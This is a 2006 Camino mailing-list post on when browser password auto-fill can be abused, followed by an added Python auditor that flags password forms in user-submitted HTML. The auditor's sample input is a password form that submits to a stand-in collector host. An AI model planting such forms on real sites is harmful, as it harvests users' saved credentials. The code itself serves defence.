On Nov 23, 2006, at 8:51 AM, Martin Girschick wrote:
> I guess a way to temporarily disable password auto-fill until the
> issue is resolved is to uncheck "Save web form passwords..." in the
> "Privacy"-section.

Or just remove/don't store passwords for sites with largely unrestricted, user-provided content. The attack only applies to sites where:
a) you have to log in to the site, and
b) people other than site admins have the ability to create HTML forms with password elements on the site, and
c) the realm of the login page is the same as the realm of the user-created pages (i.e., there is not a login.foo.com page for logging in).

The fraction of sites on the web meeting those criteria is very, very small. Simply not using password storage on those particular sites is just as secure as turning the feature off completely, with much less reduction in functionality.

-Stuart
_______________________________________________
Camino mailing list
[email protected]
http://mozdev.org/mailman/listinfo/camino
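
A site operator's view of criteria (b) and (c) above, as an added example that is not part of the original message: it scans user-submitted HTML for password inputs and reports whether the page serving that content shares a hostname with the login page. The function and class names, the sample post, the `.example` hostnames, and the use of hostname equality as a stand-in for "realm" are all assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class PasswordFormFinder(HTMLParser):
    """Records the form action for every password input in a fragment."""

    def __init__(self):
        super().__init__()
        self.actions = []        # action of each form holding a password input
        self._action = ""        # action of the <form> currently open, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").strip().lower() == "password":
            self.actions.append(self._action)

    def handle_endtag(self, tag):
        if tag == "form":
            self._action = ""


def audit(user_html, content_host, login_host):
    """Return one finding per password input found in user_html.

    exposed is True only when the content is served from the login host,
    i.e. criterion (c); hostname equality is an assumed stand-in for realm.
    """
    finder = PasswordFormFinder()
    finder.feed(user_html)
    finder.close()
    same_realm = content_host.lower() == login_host.lower()
    findings = []
    for action in finder.actions:
        target = urlsplit(action).hostname      # None for relative actions
        findings.append({
            "action": action,
            "off_site": target is not None and target != content_host.lower(),
            "exposed": same_realm,
        })
    return findings


# Constructed sample of user-submitted content (not from the original message).
SAMPLE_POST = ('<p>hello</p><form action="http://collector.example/c">'
               '<input name=u><input type="PASSWORD" name=p></form>')

if __name__ == "__main__":
    print(audit(SAMPLE_POST, "community.example", "community.example"))
    print(audit(SAMPLE_POST, "users.example", "login.example"))
```

An operator could run such a check in the content sanitizer and reject or strip any fragment that yields a finding, which removes criterion (b) regardless of how the hosts are laid out.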
